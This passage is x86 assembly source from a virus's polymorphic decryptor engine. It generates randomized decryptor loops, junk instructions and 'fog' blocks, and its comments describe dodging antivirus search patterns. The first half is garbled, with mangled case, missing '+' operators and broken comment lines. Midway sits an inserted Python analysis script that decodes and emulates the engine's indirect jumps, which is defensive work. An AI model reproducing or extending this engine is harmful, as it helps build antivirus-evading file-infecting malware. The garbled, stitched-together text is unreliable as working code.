JNZ Step_Down

Call do_step_up

JMP Short Next_UPDATE

Step_down: Call do_step_down

Next_UPDATE: SUB ECX, EAX

Call Gengarbageex

JECXZ END_UPDATE

JMP Short loop_update

END_UPDATE: RET

; ================================================== ===========

; Move INDEX_REG up

; ================================================== ===========

Do_step_up: push eax

Mov Eax, NumidXup

Call get_rnd_range

LEA ESI, DWORD PTR [EBP TBL_IDX_UP EAX * 04H]

Lodsd

Add Eax, EBP

JMP EAX

IDXUPWITHADD: MOV AX, 0C081H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

Stosd

RET

IDXUPWITHSUB: MOV AX, 0E881H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

NEG EAX

Stosd

NEG EAX

RET

IDXUPWITHINC: MOV Al, 40h

OR Al, Byte PTR [EBP INDEX_MASK]

Stosb

POP EAX

MOV EAX, 00000001H

RET

IDXUPADDADD: CALL SAVE_IT_ADD

Push EAX

MOV AX, 0C081H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

POP EDX

Sub Eax, EDX

NEG EAX

Stosd

MOV EAX, EDX

RET

IDXUPADDSUB: CALL SAVE_IT_ADD

Push EAX

Mov AX, 0e881H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

POP EDX

Sub Eax, EDX

Stosd

MOV EAX, EDX

RET

IDXUPSUBSUB: CALL SAVE_IT_SUB

Push EAX

Mov AX, 0e881H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

POP EDX

Add Eax, EDX

NEG EAX

Stosd

MOV EAX, EDX

RET

IDXUPSUBADD: CALL SAVE_IT_SUB

Push EAX

MOV AX, 0C081H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

POP EDX

Add Eax, EDX

Stosd

MOV EAX, EDX

RET

; ================================================== ===========

; Move INDEX_REG down

; ================================================== ===========

Do_step_down: push eax

Mov Eax, NumIDXDown

Call get_rnd_range

LEA ESI, DWORD PTR [EBP TBL_IDX_DOWN EAX * 04H]

Lodsd

Add Eax, EBP

JMP EAX

IDXDownwithadd: MOV AX, 0C081H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

NEG EAX

Stosd

NEG EAX

RET

IDXDownwithsub: MOV AX, 0E881H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

Stosd

RET

IDXDownwithDec: Mov Al, 48h

OR Al, Byte PTR [EBP INDEX_MASK]

Stosb

POP EAX

MOV EAX, 00000001H

RET

IDXDOWNADDADD: CALL SAVE_IT_ADD

Push EAX

MOV AX, 0C081H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

POP EDX

Sub Eax, EDX

NEG EAX

Stosd

MOV EAX, EDX

RET

IDXDOWNADDSUB: CALL SAVE_IT_ADD

Push EAX

Mov AX, 0e881H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

POP EDX

Sub Eax, EDX

NEG EAX

Stosd

MOV EAX, EDX

RET

IDXDOWNSUBSUB: CALL SAVE_IT_SUB

Push EAX

Mov AX, 0e881H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

POP EDX

Add Eax, EDX

NEG EAX

Stosd

MOV EAX, EDX

RET

IDXDOWNSUBADD: CALL SAVE_IT_SUB

Push EAX

MOV AX, 0C081H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

POP EDX

Add Eax, EDX

NEG EAX

Stosd

MOV EAX, EDX

RET

SAVE_IT_ADD: CALL TOTAL_SAVE_IT

Push Edx

MOV Al, 03H

Stosw

XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY

Call Gengarbageex

POP EAX

RET

Save_it_sub: Call Total_save_it

Push Edx

MOV Al, 2BH

Stosw

XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY

Call Gengarbageex

POP EAX

RET

Total_save_it: Call get_valid_reg

Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY

MOV Al, 0B8H

OR Al, Byte PTR [EBX REG_MASK]

Stosb

Call get_rnd32

Stosd

Push EAX

Push EBX

Call Gengarbageex

POP EBX

MOV AH, BYTE PTR [EBP INDEX_MASK]

SHL AH, 03H

OR AH, BYTE PTR [EBX REG_MASK]

OR AH, 0C0H

POP EDX

RET

; ================================================== ===========================

; Generate decryptor action: next counter value

; ================================================== ===========================

; ================================================== ===========

; Check counter direction and update counter

; using an inc or dec instruction

; ================================================== ===========

GEN_NEXT_CTR: TEST BYTE PTR [EBP BUILD_FLAGS], CRYPT_CDIR

JNZ UPD_CTR_DOWN

UPD_CTR_UP: CALL GET_RND32

And Al, 01H

JZ Countupinc

MOV Al, 40h

JMP doshitwithctr

Countupinc: MOV Al, 40h

OR Al, Byte PTR [EBP Counter_mask]

JMP short Upd_ctr_ok

UPD_CTR_DOWN: CALL GET_RND32

And Al, 01H

JZ CountuPDEC

MOV Al, 48h

JMP doshitwithctr

CountuPDEC: MOV Al, 48h

OR Al, Byte PTR [EBP Counter_mask]

UPD_CTR_OK: Stosb

RET

Doshitwithctr: Push EAX

Call Get_Valid_reg

Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY

MOV AH, BYTE PTR [EBX REG_MASK]

SHL AH, 03H

OR AH, BYTE PTR [EBP Counter_Mask]

OR AH, 0C0H

MOV Al, 8BH

Stosw

Push EBX

Call Gengarbageex

POP EBX

POP EAX

OR Al, Byte PTR [EBX REG_MASK]

Stosb

Push EBX

Call Gengarbageex

POP EBX

MOV AH, BYTE PTR [EBP Counter_Mask]

SHL AH, 03H

OR AH, BYTE PTR [EBX REG_MASK]

OR AH, 0C0H

MOV Al, 8BH

Stosw

XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY

RET

; ================================================== ===========================

; Generate decryptor action: loop

; ================================================== ===========================

; ================================================== ===========

; Use counter reg in CMP instruction?

; ================================================== ===========

Gen_Loop: Test Byte Ptr [EBP Build_Flags], Crypt_cmpctr

Jnz Doloopauxreg

; ================================================== ===========

; Generate CMP counter_reg, end_value

; ================================================== ===========

MOV AX, 0F881h

OR AH, BYTE PTR [EBP Counter_Mask]

Stosw

MOV EAX, DWORD PTR [EBP END_VALUE]

Stosd

JMP DOLOOPREADY

; ================================================== ===========

; Get a Random Valid Register To Use in A CMP Instruction

; ================================================== ===========

DOLOOPAUXREG: CALL GET_VALID_REG

Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY

; ================================================== ===========

; Move index reg value into aux reg

; ================================================== ===========

MOV AH, BYTE PTR [EBX REG_MASK]

SHL AH, 03H

OR AH, BYTE PTR [EBP Counter_Mask]

OR AH, 0C0H

MOV Al, 8BH

Stosw

; ================================================== ===========

; Guess what!?

; ================================================== ===========

Push EBX

Call Gengarbageex

POP EBX

Call get_rnd32

And Al, 03H

OR Al, Al

JZ loop_use_cmp

Test Al, 02h

JZ loop_use_sub

; ================================================== ===========

; Generate ADD aux_reg, -end_value

; ================================================== ===========

LOOP_USE_ADD: MOV AX, 0C081H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

MOV EAX, DWORD PTR [EBP END_VALUE]

NEG EAX

Stosd

JMP Short Done_loop_use

; ================================================== ===========

; Generate CMP aux_reg, end_value

; ================================================== ===========

LOOP_USE_CMP: MOV AX, 0F881H

JMP Short loop_mask_here

; ================================================== ===========

; Generate SUB aux_reg, end_value

; ================================================== ===========

LOOP_USE_SUB: MOV EAX, 0e881H

LOOP_MASK_HERE: OR AH, BYTE PTR [EBX REG_MASK]

Stosw

MOV EAX, DWORD PTR [EBP END_VALUE]

Stosd

; ================================================== ===========

; Restore aux reg state

; ================================================== ===========

DONE_LOOP_USE: XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY

; ================================================== ===========

; Generate conditional jump

; ================================================== ===========

DoloopReady: Mov Eax, NumexitLoop

Call get_rnd_range

Lea ESI, DWORD PTR [EBP TBLEXITLOOP EAX * 04H]

Lodsd

Add Eax, EBP

JMP EAX

TbleXitLoop EQU $

DD Offset DOLOOPUP

DD Offset Doloopdown

DD Offset Doloopmix

NumexitLoop EQU ($ -TblexitLoop) / 04H

; ================================================== ===========

; Generate the following structure:

;

; loop_point:

; ...

; jnz loop_point

; ...

; jmp decrypted-code

; ================================================== ===========

DOLOOPUP: MOV DWORD PTR [EBP CONDition_PTR], EDI

MOV AX, 850FH

Stosw

MOV EAX, DWORD PTR [EBP LOOP_POINT]

Sub Eax, EDI

Sub Eax, 00000004H

Stosd

Call Gengarbageex

MOV ESI, DWORD PTR [EBP PTRTOEP]

Call docomplexcmp

JMP Createfog

; ================================================== ===========

; ... or this one:

;

; loop_point:

; ...

; jz decrypted-code

; ...

; jmp loop_point

; ...

; ================================================== ===========

DOLOOPDOWN: MOV DWORD PTR [EBP CONDition_PTR], EDI

MOV AX, 840FH

Stosw

MOV EAX, DWORD PTR [EBP PTRTOEP]

SUB EAX, EDI

Sub Eax, 00000004H

Stosd

Call Gengarbageex

MOV ESI, DWORD PTR [EBP LOOP_POINT]

Call docomplexcmp

JMP Createfog

; ================================================== ===========

; Generate the following structure:

;

; loop_point:

; ...

; jnz auxdest

; ...

; jmp decrypted-code

; ...

; auxdest:

; ...

; jmp loop_point

; ================================================== ===========

DOLOOPMIX: MOV DWORD PTR [EBP CONDition_PTR], EDI

MOV AX, 850FH

Stosw

Push EDI

Stosd

Call Gengarbageex

MOV ESI, DWORD PTR [EBP PTRTOEP]

Call docomplexcmp

Call Gengarbageex

POP EDX

Mov Eax, EDI

Sub Eax, 00000004H

Sub Eax, EDX

Mov DWORD PTR [EDX], EAX

Call Gengarbageex

MOV ESI, DWORD PTR [EBP LOOP_POINT]

Call docomplexcmp

; ================================================== ===========

; I noticed some AV was using the JZ / JNZ instruction at the

; end of the decryptor in a search pattern... so now I'm going

; to build it at runtime (sometimes...)

; ================================================== ===========

Createfog: test byte ptr [EBP Build_Flags], Crypt_fog

JZ Nofogret

Mov Eax, Numfog

Call get_rnd_range

LEA ESI, DWORD PTR [EBP TBLDOFOG EAX * 04H]

Lodsd

Add Eax, EBP

Call EAX

MOV EAX, Numfixfog

Call get_rnd_range

LEA ESI, DWORD PTR [EBP TBLFIXFOG EAX * 04H]

Lodsd

MOV ESI, DWORD PTR [EBP CONDition_ptr]

Add Eax, EBP

Call EAX

Nofogret: Ret

; ================================================== ===========================

; Prepare pointer to memory into fog block, using ADD

; ================================================== ===========================

DofogAdd: Call Fogstart

SUB EAX, DWORD PTR [EBP XRND1]

Push EDI

Push EAX

MOV EBX, DWORD PTR [EBP XRNDREG]

MOV EDI, DWORD PTR [EBP XRNDFIXPTR]

MOV AX, 0C081H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

POP EAX

Stosd

POP EDI

RET

FixfogAdd: Push Edi

MOV EDI, DWORD PTR [EBP XRNDMATH]

MOV Al, 81H

MOV AH, BYTE PTR [EBX REG_MASK]

Stosw

Call get_rnd32

Stosd

Sub DWORD PTR [ESI], EAX

POP EDI

RET

; ================================================== ===========================

Prepare Pointer To Memory Into Fog Block, Using Sub

; ================================================== ===========================

DOFOGSUB: Call FogStart

NEG EAX

Add Eax, DWORD PTR [EBP XRND1]

Push EDI

Push EAX

MOV EBX, DWORD PTR [EBP XRNDREG]

MOV EDI, DWORD PTR [EBP XRNDFIXPTR]

Mov AX, 0e881H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

POP EAX

Stosd

POP EDI

RET

FIXFOGSUB: PUSH EDI

MOV EDI, DWORD PTR [EBP XRNDMATH]

MOV AX, 2881H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

Call get_rnd32

Stosd

Add DWORD PTR [ESI], EAX

POP EDI

RET

; ================================================== ===========================; prepare Pointer to Memory Into Fog Block, Using XOR

; ================================================== ===========================

DOFOGXOR: CALL FOGSTART

XOR EAX, DWORD PTR [EBP XRND1]

Push EDI

Push EAX

MOV EBX, DWORD PTR [EBP XRNDREG]

MOV EDI, DWORD PTR [EBP XRNDFIXPTR]

MOV AX, 0F081H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

POP EAX

Stosd

POP EDI

RET

FIXFOGXOR: PUSH EDI

MOV EDI, DWORD PTR [EBP XRNDMATH]

MOV AX, 3081H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

Call get_rnd32

Stosd

XOR DWORD PTR [ESI], EAX

POP EDI

RET

; ================================================== ===========================

Setup Fog Block

; ================================================== =========================== fogstart: MOV ESI, DWORD PTR [EBP CONDition_ptr]

MOV EAX, ESI

Call fromPoly2rva

RET

; ================================================== ===========================

Convert a Given Value in The Poly Decryptor To ITS Future RVA

;

On Entry:

EAX -> Value to Convert

ON EXIT:

EAX -> Converted Value

; ================================================== ===========================

FromPoly2rva: Push Edx

SUB EAX, DWORD PTR [EBP MAP_IS_HERE]

Add Eax, DWORD PTR [EBP HOST_BASE]

MOV EDX, DWORD PTR [EBP VIRUS_SH]

Sub Eax, DWORD PTR [EDX SH_POINTERTORAWDATA]

Add Eax, DWORD PTR [EDX SH_VIRTUALADDRESS]

POP EDX

RET

; ================================================== ===========================; Product complex end

;

On Entry:

ESI -> PTRTOEP or LOOP_POINT

; ================================================== ===========================

DOCOMPLEXCMP: CALL GET_RND32

And Al, 01H

JZ JMPENDJMPREG

; ================================================== ===========

Go Using JMP IMM

; ================================================== ===========

JMPENDJMPIMM: MOV Al, 0e9h

Stosb

MOV EAX, ESI

Sub Eax, EDI

Sub Eax, 00000004H

Stosd

RET

; ================================================== ===========; Go Using Complex Escheme

; ================================================== ===========

JMPENDJMPREG: PUSH ESI

Call Get_Valid_reg

Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY

MOV Al, 0B8H

OR Al, Byte PTR [EBX REG_MASK]

Stosb

Call get_rnd32

Stosd

Push EAX

Push EBX

Call Gengarbageex

Mov Eax, Numjmpend

Call get_rnd_range

LEA ESI, DWORD PTR [EBP TBL_JMP_END EAX * 04H]

Lodsd

Add Eax, EBP

POP EBX

POP EDX

POP ESI

Call EAX

Push EBX

Call Gengarbageex

POP EBX

Call get_rnd32

And Al, 01H

JZ endusejmpreg

Endusepushret: MOV Al, 50h

OR Al, Byte PTR [EBX REG_MASK]

Stosb

XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY

Call Gengarbageex

Call gen_ret

RET

EnduseJMPREG: MOV AX, 0E0FFH

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY

RET

; ================================================== ===========================

; Complex end using add; ========================================================================================================================================================================================================================== =======================================================================================================================================================

JMPENDREGADD: MOV AX, 0C081H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

Call Extendedended

Sub Eax, EDX

Stosd

RET

; ================================================== ===========================

COMPLEX End Using Sub

; ================================================== ===========================

JMPENDREGSUB: MOV AX, 0E881H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

Call Extendedended

Sub Eax, EDX

NEG EAX

Stosd

RET

; ================================================== ===========================; Complex end using

; ================================================== ===========================

JMPENDREGXOR: MOV AX, 0F081H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

Call Extendedended

XOR EAX, EDX

Stosd

RET

; ================================================== ===========================

COMPLEX Fixed Address

; ================================================== ===========================

Extendedend: MOV Eax, ESI

Call fromPoly2rva

RET
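The register-indirect loop exit built by docomplexcmp (mov reg,rnd / add|sub|xor reg,fixup / jmp reg or push reg + ret) is what an analyst has to resolve to find where the decryptor continues, since the real target never appears as a jmp rel32. The following Python is an added example, not part of the Fever source: it decodes the opcode forms these routines write and emulates the register arithmetic to recover the target. The byte strings are constructed, and the target RVA 00401234h is a placeholder value.

```python
"""Resolve the register-indirect decryptor exit emitted by docomplexcmp.

Added example (not from the Fever source): decodes the opcode forms the
engine writes (b8+r imm32; 81 /n r32,imm32; 50+r; c3; ff e0+r; 0f 85 rel32)
and emulates the register arithmetic to find the final jump target.
"""
import struct

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
# 81 /n id: the ModRM reg field selects the ALU op (0c0h|mask in the source)
ALU_OPS = {0: "add", 1: "or", 4: "and", 5: "sub", 6: "xor"}
MASK32 = 0xFFFFFFFF


def decode(code):
    """Return a list of (mnemonic, operands) for the subset above."""
    insns, i = [], 0
    while i < len(code):
        op = code[i]
        if 0xB8 <= op <= 0xBF:                          # b8+r id: mov r32,imm32
            imm = struct.unpack_from("<I", code, i + 1)[0]
            insns.append(("mov", (REGS[op - 0xB8], imm)))
            i += 5
        elif op == 0x81 and (code[i + 1] >> 6) == 3:    # 81 /n id, register form
            modrm = code[i + 1]
            imm = struct.unpack_from("<I", code, i + 2)[0]
            insns.append((ALU_OPS[(modrm >> 3) & 7], (REGS[modrm & 7], imm)))
            i += 6
        elif 0x50 <= op <= 0x57:                        # 50+r: push r32
            insns.append(("push", (REGS[op - 0x50],)))
            i += 1
        elif op == 0xC3:                                # c3: ret
            insns.append(("ret", ()))
            i += 1
        elif op == 0xFF and (code[i + 1] & 0xF8) == 0xE0:   # ff e0+r: jmp r32
            insns.append(("jmp", (REGS[code[i + 1] & 7],)))
            i += 2
        elif op == 0x0F and code[i + 1] == 0x85:        # 0f 85 rel32: jnz
            rel = struct.unpack_from("<i", code, i + 2)[0]
            insns.append(("jnz", (rel,)))
            i += 6
        else:
            raise ValueError("unsupported opcode %#04x at offset %d" % (op, i))
    return insns


def resolve_target(code):
    """Emulate mov/ALU on registers and return the absolute address reached by
    the final 'jmp reg' or 'push reg / ret' (None if neither occurs)."""
    regs, pushed = {}, None
    for mnem, ops in decode(code):
        if mnem == "mov":
            regs[ops[0]] = ops[1]
        elif mnem in ALU_OPS.values():
            reg, imm = ops
            v = regs.get(reg, 0)
            if mnem == "add":
                v = (v + imm) & MASK32
            elif mnem == "sub":
                v = (v - imm) & MASK32
            elif mnem == "xor":
                v ^= imm
            elif mnem == "or":
                v |= imm
            else:
                v &= imm
            regs[reg] = v
        elif mnem == "push":
            pushed = regs.get(ops[0])
        elif mnem == "jmp":
            return regs.get(ops[0])
        elif mnem == "ret":
            return pushed
    return None


# Constructed samples (placeholder target RVA 00401234h, not a real address):
# jmpendregadd + endusejmpreg:  mov ebx,0DEADBEEFh / add ebx,21925345h / jmp ebx
SAMPLE_ADD_JMP = bytes.fromhex("bbefbeadde" "81c345539221" "ffe3")
# jmpendregsub + endusepushret: mov ecx,12345678h / sub ecx,11F44444h / push ecx / ret
SAMPLE_SUB_RET = bytes.fromhex("b978563412" "81e94444f411" "51" "c3")
# jmpendregxor + endusejmpreg:  mov esi,0A5A5A5A5h / xor esi,key / jmp esi
SAMPLE_XOR_JMP = bytes.fromhex(
    "bea5a5a5a5" "81f6" + struct.pack("<I", 0xA5A5A5A5 ^ 0x00401234).hex() + "ffe6")

if __name__ == "__main__":
    for name, blob in (("add/jmp", SAMPLE_ADD_JMP), ("sub/ret", SAMPLE_SUB_RET),
                       ("xor/jmp", SAMPLE_XOR_JMP)):
        print(name, ["%s %s" % (m, o) for m, o in decode(blob)],
              hex(resolve_target(blob)))
```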

; ===========================================================================
; Generate init garbage
; ===========================================================================

geninitgarbage: mov     eax,00000005h
                call    get_rnd_range
                or      eax,eax
                jz      exitinitgarbage
                mov     ecx,eax
loop_g_i_g:     push    ecx
                mov     eax,(end_i_g-tbl_i_g)/04h
                call    get_rnd_range
                lea     esi,dword ptr [ebp+tbl_i_g+eax*04h]
                lodsd
                add     eax,ebp
                call    eax
                pop     ecx
                loop    loop_g_i_g
exitinitgarbage: ret

; ===========================================================================
; Generate some garbage code
; ===========================================================================

gengarbageex:   mov     eax,00000004h
                jmp     short godirecttohell
gen_garbage:    mov     eax,00000002h
godirecttohell: push    ecx
                push    esi
                inc     byte ptr [ebp+recursive_level]
                call    get_rnd_range
                inc     eax
                inc     eax
                mov     ecx,eax
loop_garbage:   push    ecx
                mov     eax,(end_garbage-tbl_garbage)/04h
                cmp     byte ptr [ebp+recursive_level],06h
                jae     too_much_shit
                cmp     byte ptr [ebp+recursive_level],02h
                jb      ok_gen_num
                mov     eax,(save_space-tbl_garbage)/04h
ok_gen_num:     call    get_rnd_range
                lea     esi,dword ptr [ebp+tbl_garbage+eax*04h]
                lodsd
                add     eax,ebp
                call    eax
too_much_shit:  pop     ecx
                loop    loop_garbage

; ============================================================
; Update recursive level
; ============================================================

exit_gg:        dec     byte ptr [ebp+recursive_level]
                pop     esi
                pop     ecx
                ret

; ===========================================================================
; Generate mov reg,imm
; ===========================================================================

; ============================================================
; Generate mov reg32,imm
; ============================================================

g_movreg32imm:  call    get_valid_reg
                mov     al,0b8h                 ; b8+r = mov reg32,imm32
                or      al,byte ptr [ebx+reg_mask]
                stosb
                call    get_rnd32
                stosd
                ret

; ============================================================
; Generate mov reg16,imm
; ============================================================

g_movreg16imm:  call    get_valid_reg
                mov     ax,0b866h               ; 66 b8+r = mov reg16,imm16
                or      ah,byte ptr [ebx+reg_mask]
                stosw
                call    get_rnd32
                stosw
                ret

; ============================================================
; Generate mov reg8,imm
; ============================================================

g_movreg8imm:   call    get_valid_reg
                test    byte ptr [ebx+reg_flags],reg_no_8bit
                jnz     a_movreg8imm
                call    get_rnd32
                mov     al,0b0h                 ; b0+r = mov reg8,imm8
                or      al,byte ptr [ebx+reg_mask]
                push    eax
                call    get_rnd32
                pop     edx
                and     ax,0004h                ; randomly pick the high 8-bit half
                or      ax,dx
                stosw
a_movreg8imm:   ret

; ===========================================================================
; Generate mov reg,reg
; ===========================================================================

g_movregreg32:  call    get_rnd_reg
                push    ebx
                call    get_valid_reg
                pop     edx
                cmp     ebx,edx
                je      a_movregreg32
c_movregreg32:  mov     al,8bh                  ; mov r32,r/m32
h_movregreg32:  mov     ah,byte ptr [ebx+reg_mask]
                shl     ah,03h
                or      ah,byte ptr [edx+reg_mask]
                or      ah,0c0h
                stosw
a_movregreg32:  ret

g_movregreg16:  call    get_rnd_reg
                push    ebx
                call    get_valid_reg
                pop     edx
                cmp     ebx,edx
                je      a_movregreg32
                mov     al,66h
                stosb
                jmp     short c_movregreg32

g_movregreg8:   call    get_rnd_reg
                test    byte ptr [ebx+reg_flags],reg_no_8bit
                jnz     a_movregreg8
                push    ebx
                call    get_valid_reg
                pop     edx
                mov     al,8ah                  ; mov r8,r/m8
h_movregreg8:   test    byte ptr [ebx+reg_flags],reg_no_8bit
                jnz     a_movregreg8
                cmp     ebx,edx
                je      a_movregreg8
                mov     ah,byte ptr [ebx+reg_mask]
                shl     ah,03h
                or      ah,byte ptr [edx+reg_mask]
                or      ah,0c0h
                push    eax
                call    get_rnd32
                pop     edx
                and     ax,2400h                ; randomly pick high 8-bit halves
                or      ax,dx
                stosw
a_movregreg8:   ret

; ===========================================================================
; Generate xchg reg,reg
; ===========================================================================

g_xchgregreg32: call    get_valid_reg
                push    ebx
                call    get_valid_reg
                pop     edx
                cmp     ebx,edx
                je      a_movregreg32
h_xchgregreg32: mov     al,87h                  ; xchg r32,r/m32
                jmp     h_movregreg32

g_xchgregreg16: call    get_valid_reg
                push    ebx
                call    get_valid_reg
                pop     edx
                cmp     ebx,edx
                je      a_movregreg32
                mov     al,66h
                stosb
                jmp     short h_xchgregreg32

g_xchgregreg8:  call    get_valid_reg
                test    byte ptr [ebx+reg_flags],reg_no_8bit
                jnz     a_movregreg8
                push    ebx
                call    get_valid_reg
                pop     edx
                mov     al,86h                  ; xchg r8,r/m8
                jmp     h_movregreg8

; ===========================================================================
; Generate movzx/movsx reg32,reg16
; ===========================================================================

g_movzx_movsx:  call    get_rnd32
                mov     ah,0b7h                 ; 0f b7 = movzx r32,r/m16
                and     al,01h
                jz      d_movzx
                mov     ah,0bfh                 ; 0f bf = movsx r32,r/m16
d_movzx:        mov     al,0fh
                stosw
                call    get_rnd_reg
                push    ebx
                call    get_valid_reg
                pop     edx
                mov     al,byte ptr [ebx+reg_mask]
                shl     al,03h
                or      al,0c0h
                or      al,byte ptr [edx+reg_mask]
                stosb
                ret

; ===========================================================================
; Generate inc reg
; ===========================================================================

g_inc_reg32:    call    get_valid_reg
                mov     al,40h                  ; 40+r = inc reg32
                or      al,byte ptr [ebx+reg_mask]
                stosb
                ret

g_inc_reg16:    mov     al,66h
                stosb
                jmp     short g_inc_reg32

g_inc_reg8:     call    get_valid_reg
                test    byte ptr [ebx+reg_flags],reg_no_8bit
                jnz     a_inc_reg8
                call    get_rnd32
                and     ah,04h
                or      ah,byte ptr [ebx+reg_mask]
                or      ah,0c0h
                mov     al,0feh                 ; fe /0 = inc r/m8
                stosw
a_inc_reg8:     ret

; ===========================================================================
; Generate dec reg
; ===========================================================================

g_dec_reg32:    call    get_valid_reg
                mov     al,48h                  ; 48+r = dec reg32
                or      al,byte ptr [ebx+reg_mask]
                stosb
                ret

g_dec_reg16:    mov     al,66h
                stosb
                jmp     short g_dec_reg32

g_dec_reg8:     call    get_valid_reg
                test    byte ptr [ebx+reg_flags],reg_no_8bit
                jnz     a_dec_reg8
                call    get_rnd32
                and     ah,04h
                or      ah,byte ptr [ebx+reg_mask]
                or      ah,0c8h
                mov     al,0feh                 ; fe /1 = dec r/m8
                stosw
a_dec_reg8:     ret

; ===========================================================================
; Generate add/sub/xor/or/and reg,imm
; ===========================================================================

g_mathregimm32: mov     al,81h
                stosb
                call    get_valid_reg
                call    do_math_work
                stosd
                ret

g_mathregimm16: mov     ax,8166h
                stosw
                call    get_valid_reg
                call    do_math_work
                stosw
                ret

g_mathregimm8:  call    get_valid_reg
                test    byte ptr [ebx+reg_flags],reg_no_8bit
                jnz     a_math8
                mov     al,80h
                stosb
                call    do_math_work
                stosb
                and     ah,04h
                or      byte ptr [edi-00000002h],ah     ; randomly use the high 8-bit half
a_math8:        ret

do_math_work:   mov     eax,end_math_imm-tbl_math_imm
                call    get_rnd_range
                lea     esi,dword ptr [ebp+eax+tbl_math_imm]
                lodsb
                or      al,byte ptr [ebx+reg_mask]
                stosb
                call    get_rnd32
                ret

; ===========================================================================
; Generate decryption instructions (real or fake)
; ===========================================================================

; ============================================================
; Check if we are going to use a displacement in the
; indexing mode
; ============================================================

fake_or_not:    mov     eax,dword ptr [ebp+fake_ptr_disp]
                or      eax,eax
                jnz     more_complex

; ============================================================
; Choose generator for [reg] indexing mode
; ============================================================

                mov     edx,offset tbl_idx_reg
                call    choose_magic
                jmp     you_got_it

; ============================================================
; More fun?!?!
; ============================================================

more_complex:   mov     al,byte ptr [ebp+fake_build_flags]
                test    al,crypt_simplex
                jnz     crypt_xtended

; ============================================================
; Choose generator for [reg+imm] indexing mode
; ============================================================

                mov     edx,offset tbl_dis_reg
                call    choose_magic

; ============================================================
; Use magic to convert some values into
; desired instructions
; ============================================================

you_got_it:     call    size_correct
                mov     dl,byte ptr [ebp+fake_index_mask]
                lodsb
                or      al,al
                jnz     adn_reg_01
                cmp     dl,00000101b
                je      adn_reg_02
adn_reg_01:     lodsb
                or      al,dl
                stosb
                jmp     common_part
adn_reg_02:     lodsb
                add     al,45h
                xor     ah,ah
                stosw
                jmp     common_part

; ============================================================
; Choose [reg+reg] or [reg+reg+disp]
; ============================================================

crypt_xtended:  xor     eax,eax
                mov     dword ptr [ebp+disp2disp],eax   ; clear disp-over-disp
                test    al,crypt_complex
                jz      ok_complex

; ============================================================
; Get random displacement from current displacement
; Eeehh?!?
; ============================================================

                mov     eax,00001000h
                call    get_rnd_range
                mov     dword ptr [ebp+disp2disp],eax
                call    load_aux
                push    ebx
                call    gengarbageex

; ============================================================
; Choose generator for [reg+reg+imm] indexing mode
; ============================================================

                mov     edx,offset tbl_paranoia
                call    choose_magic
                jmp     short done_xtended

ok_complex:     mov     eax,dword ptr [ebp+fake_ptr_disp]
                call    load_aux
                push    ebx
                call    gengarbageex

; ============================================================
; Choose generator for [reg+reg] indexing mode
; ============================================================

                mov     edx,offset tbl_xtended
                call    choose_magic

; ============================================================
; Build decryptor instructions
; ============================================================

done_xtended:   call    size_correct
                pop     ebx
                mov     dl,byte ptr [ebp+fake_index_mask]
                lodsb
                mov     cl,al
                or      al,al
                jnz     arn_reg_01
                cmp     dl,00000101b
                jne     arn_reg_01
                lodsb
                add     al,40h
                stosb
                jmp     short arn_reg_02
arn_reg_01:     movsb
arn_reg_02:     mov     al,byte ptr [ebx+reg_mask]
                shl     al,03h
                or      al,dl
                stosb
                or      cl,cl
                jnz     arn_reg_03
                cmp     dl,00000101b
                jne     arn_reg_03
                xor     al,al
                stosb

; ============================================================
; Restore aux reg state
; ============================================================

arn_reg_03:     xor     byte ptr [ebx+reg_flags],reg_read_only

; ============================================================
; Get post-build flags
; ============================================================

common_part:    lodsb

; ============================================================
; Insert displacement from real address?
; ============================================================

                test    al,magic_putdisp
                jz      skip_disp
                push    eax
                mov     eax,dword ptr [ebp+fake_ptr_disp]
                sub     eax,dword ptr [ebp+disp2disp]
                neg     eax
                stosd
                pop     eax

; ============================================================
; Insert key?
; ============================================================

skip_disp:      test    al,magic_putkey
                jz      skip_key
                call    copy_key
skip_key:       ret

; ===========================================================================
; Choose a magic generator
; ===========================================================================

choose_magic:   mov     eax,00000006h
                call    get_rnd_range
                add     edx,ebp
                lea     esi,dword ptr [edx+eax*04h]
                lodsd
                add     eax,ebp
                mov     esi,eax
                ret

; ===========================================================================
; Do operand size correction
; ===========================================================================

size_correct:   lodsb
                mov     ah,byte ptr [ebp+fake_oper_size]
                cmp     ah,01h
                je      store_correct
                inc     al
                cmp     ah,04h
                je      store_correct
                mov     ah,66h                  ; 16-bit operand: prefix with 66h
                xchg    ah,al
                stosw
                ret
store_correct:  stosb
                ret

; ===========================================================================
; Load aux reg with displacement
; ===========================================================================

; ============================================================
; Get a valid auxiliary register
; ============================================================

load_aux:       push    eax
